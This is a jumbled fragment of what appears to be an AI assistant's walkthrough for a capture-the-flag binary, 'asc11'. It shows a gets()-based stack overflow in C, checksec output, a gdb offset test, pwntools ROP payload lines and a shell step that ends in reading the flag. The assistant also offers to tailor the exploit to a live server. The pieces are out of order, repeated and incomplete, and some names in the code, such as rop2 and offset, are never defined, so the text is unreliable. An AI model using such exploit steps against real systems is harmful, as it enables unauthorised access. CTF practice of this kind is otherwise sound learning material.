void main(void) char buf[32]; setvbuf(stdout, NULL, 2, 0); puts("Input: "); gets(buf); // <-- vulnerable
payload2 = b'A'*offset + rop2.chain() p.sendlineafter(b'Input: ', payload2) asc 11
gdb ./asc11 r < <(python3 -c "print('A'*50)") Crash at RIP = 0x4141414141414141 → offset 40. Check if there’s a win or shell function: void main(void) char buf[32]; setvbuf(stdout, NULL, 2, 0);
asc11: ELF 64-bit, dynamically linked, not stripped Arch: amd64 RELRO: Partial Stack: No canary found NX: Enabled PIE: Disabled Run it to see behavior: void main(void) char buf[32]
p.interactive() Run exploit → shell → cat flag.txt . If you provide the actual binary and server info , I can tailor the exact exploit, offsets, and libc version. Does this match your ASC 11 challenge?